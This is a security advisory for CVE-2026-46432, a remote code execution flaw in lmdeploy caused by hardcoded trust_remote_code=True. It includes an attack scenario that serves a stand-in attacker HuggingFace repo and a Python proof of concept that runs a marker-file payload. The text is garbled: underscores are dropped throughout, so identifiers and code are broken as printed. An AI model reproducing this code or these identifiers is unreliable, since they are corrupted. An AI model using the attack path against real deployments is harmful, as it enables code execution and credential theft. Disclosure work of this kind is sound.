CVE-2026-46432

Summary

lmdeploy/archs.py
lmdeploy/utils.py

Affected version

lmdeploy <= 0.12.3

Vulnerable code

lmdeploy/archs.py:154
AutoConfig.from pretrained(..., trust remote code=True)

lmdeploy/archs.py:157
PretrainedConfig.get config dict(..., trust remote code=True)

lmdeploy/utils.py:225
GenerationConfig.from pretrained(..., trust remote code=True)

AutoConfig.from pretrained(model path, trust remote code=True)

GenerationConfig.from pretrained(path, trust remote code=True)

Attack scenario

1. An attacker obtains the ability to control or modify the model path used by an lmdeploy deployment. Examples include deployment configuration access, CI/CD configuration access, Kubernetes or container configuration access, or a managed environment where users can submit model IDs for serving.
2. The attacker sets the model path to an attacker-controlled HuggingFace repository, for example:

attacker-org/malicious-model

3. The lmdeploy serving process starts with that model path:

lmdeploy serve api server attacker-org/malicious-model

4. During model initialization, lmdeploy calls HuggingFace Transformers APIs with trust remote code=True.
5. Transformers loads and executes remote Python code from the attacker-controlled model repository.
6. The payload runs with the privileges of the lmdeploy serving process.

Why this is security-sensitive

Proof of concept

#!/usr/bin/env python3
from  future  import annotations

import argparse
import importlib.util
import os
import sys
import tempfile
from pathlib import Path

MARKER = Path("/tmp/LMDEPLOY TRUST REMOTE CODE RCE PROOF")
MALICIOUS MODEL = "attacker-org/malicious-model"


def simulate lmdeploy model load(model path: str) -> None:
  """
  Simulates lmdeploy model initialization where trust remote code=True is hardcoded.

  Real vulnerable pattern:
    AutoConfig.from pretrained(model path, trust remote code=True)
    GenerationConfig.from pretrained(path, trust remote code=True)

  When trust remote code=True, a malicious HuggingFace model repository can
  execute custom Python code during loading.
  """

  fake model dir = Path(tempfile.mkdtemp(prefix="fake lmdeploy model "))
  module name = model path.split("/")[-1].replace("-", " ")
  modeling file = fake model dir / f"modeling {module name}.py"

  payload = f'''
import os
from pathlib import Path

Path("{MARKER}").write text(
  "lmdeploy trust remote code execution confirmed
"
  f"model path={model path!r}
"
  f"pid={{os.getpid()}} euid={{os.geteuid()}}
"
)
'''
  modeling file.write text(payload)

  spec = importlib.util.spec from file location(f"modeling {module name}", modeling file)
  assert spec is not None and spec.loader is not None

  mod = importlib.util.module from spec(spec)
  spec.loader.exec module(mod)


def main() -> int:
  parser = argparse.ArgumentParser()
  parser.add argument("--model-id", default=MALICIOUS MODEL)
  args = parser.parse args()

  if MARKER.exists():
    MARKER.unlink()

  print(f"[*] Simulating lmdeploy loading model: {args.model id}")
  print("[*] trust remote code=True is hardcoded in lmdeploy model-loading paths")

  simulate lmdeploy model load(args.model id)

  if MARKER.exists():
    print("[+] Code execution confirmed")
    print(MARKER.read text())
    return 0

  print("[-] Marker file was not created", file=sys.stderr)
  return 1


if  name  == " main ":
  raise SystemExit(main())

[+] Code execution confirmed

/tmp/LMDEPLOY TRUST REMOTE CODE RCE PROOF

Impact

• Read files accessible to the lmdeploy process.
• Access environment variables, model provider credentials, HuggingFace tokens, cloud credentials, and API keys.
• Modify model-serving behavior or tamper with responses.
• Execute arbitrary operating-system commands.
• Access request data or internal service credentials available to the serving process.
• Cause denial of service by crashing or destabilizing the serving daemon.
• Pivot to internal services reachable from the lmdeploy host or container.